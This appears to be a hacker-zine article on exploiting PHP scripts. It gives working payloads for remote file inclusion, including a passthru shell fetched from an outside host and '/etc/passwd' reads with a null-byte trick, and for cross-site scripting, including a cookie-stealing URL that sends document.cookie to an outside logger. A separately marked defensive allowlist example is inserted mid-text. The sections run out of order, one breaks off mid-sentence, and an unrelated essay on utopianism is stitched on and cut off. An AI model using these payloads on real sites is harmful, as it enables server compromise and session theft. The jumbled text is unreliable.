Finding and Exploiting PHP Script Vulnerabilities

include, require, or fopen

If input is passed to include, require, or fopen in ways similar to:

include "$page" or require "$page";

... then depending on the server configuration, you could either read files off their machine or even execute your own PHP code. By setting $page to something like '/etc/passwd' or "../../admin/.htaccess", you could read sensitive data off of their machine like server config files or passwd files. In many systems, if you pass a URL to include(), their server will make an HTTP connection, grab the file and execute the PHP code. This means you can write a script like <?php echo passthru($cmd); ?>, save it on your webserver, and call their script like include.php?file=http://www.yourdomain.com/passthru.php&cmd=cat /etc/passwd.
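The include pattern described above, hardened, as an added example that is not from the article: the request value is only ever used as a key into a fixed allowlist, and the resolved path must stay inside the pages directory. The page names, the directory layout and the function name resolve_page are assumptions; the rejected sample values are the ones quoted in the paragraph above.

```php
<?php
// Added example (not from the zine): choose the file to include from a
// fixed allowlist instead of from request input. Page names, directory
// layout and function name are assumptions for this illustration.
//
// Pattern discussed in the article, for comparison:
//     include "$page";    // $page is whatever the client sent
//
// Related php.ini setting: allow_url_include = Off keeps include/require
// from fetching http:// or ftp:// URLs at all.

const PAGES = [
    'home'  => 'home.php',
    'links' => 'links.php',
    'about' => 'about.php',
];

/**
 * Map a requested page name to an absolute file path, or null if the
 * request does not name a known page. The client value never becomes
 * part of a file name; it is only compared against the keys of PAGES.
 */
function resolve_page(string $requested, string $baseDir): ?string
{
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    if ($base === false || $path === false) {
        return null;
    }
    // Defence in depth: after symlinks are resolved, the file must still
    // live under the pages directory.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0 || !is_file($path)) {
        return null;
    }
    return $path;
}

// --- Demonstration with constructed files and request values -------------
$baseDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_demo_' . getmypid();
mkdir($baseDir);
foreach (PAGES as $name => $file) {
    file_put_contents($baseDir . DIRECTORY_SEPARATOR . $file, "<h1>$name</h1>\n");
}

$requests = [
    'links',                                     // a known page
    '/etc/passwd',                               // absolute path
    '../../admin/.htaccess',                     // directory traversal
    'http://www.yourdomain.com/passthru.php',    // remote URL
    'links.php',                                 // a file name rather than a page key
];

foreach ($requests as $request) {
    $path = resolve_page($request, $baseDir);
    if ($path === null) {
        // In a real handler: answer 404 and include nothing.
        echo "rejected: $request\n";
    } else {
        echo "included: $request\n";
        include $path;
    }
}

// Clean up the constructed files.
foreach (PAGES as $file) {
    unlink($baseDir . DIRECTORY_SEPARATOR . $file);
}
rmdir($baseDir);
```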
Depending on how they modify their statement (like include "includes/$page", include "$page.php", etc.) it may limit what you can do or make it a bit more difficult. Oftentimes error statements will reveal the path of the script as well as what input they are passing to include.

Warning: Unable to access fun in /home/sites/18/web/cia/include.php on line 1

If a script ends your input with an extension (like include "/path/to/$file.inc"), you may be forced into reading only files ending with .inc - unless they are running specific combinations of PHP and their OS which may allow you to add a %00 at the end of your input, which will cause include to ignore the extension, ex: include.php?file=../../../../../etc/passwd%00.

cross site scripting

When a script takes input and sends it back to the browser without sufficient validation, you could inject javascript code that lets you interact with the user's browser.

<?php echo "Hello, $name"; ?>

showname.php?name=freeme<script>alert(document.cookie);</script>

This would make an alert box displaying the cookies for the given domain to the user. If this is vulnerable, it's also very likely that you could craft a URL that redirects the user to an offsite URL that logs the user's cookie for later retrieval through something like...

showname.php?name=freeme<script>window.navigate("http://www.somehost.com/cookiesteal.php?thegoods="+document.cookie)</script>

...where cookiesteal.php would log all incoming requests and the contents of 'thegoods'. Many web scripts use cookies to store authentication information, which you could use on the original site either by saving the values of these cookies as your own, cracking passwords, etc.

You can spend all your time making sure all your services are patched, install expensive firewalls and tripwire software, and make sure all your communication is done over SSL.
But even the most complex and secure server can all go to waste if you are using insecure PHP code. More and more people are realizing the weight of web application security holes. Instead of talking about specific exploits that come and go, I will try to explain some techniques that will help to find vulnerabilities in PHP software and how to exploit them to gain access.

Often most vulnerabilities are not in the actual server software but in poorly written code or irresponsible configuration. Most of the time it comes down to not validating input before it is passed to vital system functions. At the worst, this will allow you to execute commands as the same user that the web server is running as (usually www, apache, or nobody), which usually has a relatively low level of permissions on the server. It's not much, but the access can be exploited further to possibly gain more permissions on the machine or read sensitive information, or, depending on how poorly the server is configured (folders and files chmodded to 666, passwords and configuration files lying around, etc.), it could be devastating indeed.

$The Fundamentals;

If variables are passed from your client to their server, you can change these values to anything you'd like. This is one of the most fundamental principles behind web security. If you see a link like 'index.php?section=links', their script examines the variable 'section' and responds accordingly. While there may not be a way to modify the value of this variable on their site itself, you could do so through a number of ways.

There are three ways variables can be passed from your browser to the PHP script: over GET, POST, or cookies. Sending variables over the address bar (like asdf.php?var1=somevalue&var2=anothervalue) is known as the GET method, and they can be changed directly in the URL bar.
Variables sent from a form are sent over POST, and can be changed either by creating your own HTML page with a form of your own, or by forging your own HTTP request using the HTTP protocol (this can be done using telnet on port 80 - see rfc2616 for specific commands). Cookies are saved and sent in a number of different ways varying on your operating system and web browser. If you can't find a way to change the values of your cookies through a GUI interface, you can change the values through forging your own HTTP request as well.

Many times you can use any of the above methods to set a variable inside of a script. But more and more PHP configurations have register_globals off. If this is the case, PHP scripts have to refer to variables like $_GET['varname'], $_POST and $_COOKIE. This restricts you to setting variables using the method they were intended to be used with. This does not make it invincible, but it forces you to spoof the variable in the way that the script is expecting the input.

$Generating Errors;

Once you find out how to inject different values into variables of a web application, you should try to generate an error code. This can be done by inserting all sorts of (not so) random characters into these scripts. Very often scripts will dump all sorts of messages that could help you find out their database structure, file paths, and more. If you found a script similar to index.php?file=links.php, and tried changing it to index.php?file=linksaaaa.php, it might give you an error similar to:

Paradise Engineering, Political Change
by archaios

Utopianism, rooted in the primal desire for abrogation of mortality, is the foundation of the modern hedonistic imperative. Alluding to an unseen order, archetypal modern religion disavows such a notion, a philosophy closely aligned with 19th century, morally absolutist cautionaries.
The egregious nature of such a crucial error is self-explanatory, scientific dogma proselytizing the ability to absolve man of His painful iniquities through what may be termed 'paradise engineering', a much-maligned concept as a direct result of such insidious works as Orwell's 1984 and Huxley's Brave New World. The failure of communism in the Soviet Union relinquishes all doubt that, without a concerted effort by the proletariat to debase the plutocratic capitalist oligarchy (ubiquitous in Western nations), Utopianism is bereft of rationale and the prevalation of archaic Judeo-Christian ideals is inevitable. The decidedly utilitarian basis of the consumerist society presented in Brave New World eviscerates the possibility of egalitarianism in its purest form, social order - the presupposed need of which delineates historical analogues - rooted in shades of apathetic totalitarianism. Impugning upon users of psychoactive substances the sin of 'defiling God's temple', contemporary morality insinuates that although the next-generation of euphori- and empathogenic drugs are within reach, such indulgence is contrary to the notional social hierarchy and transcends the suffering that provides a theoretical basis for Christ's salvati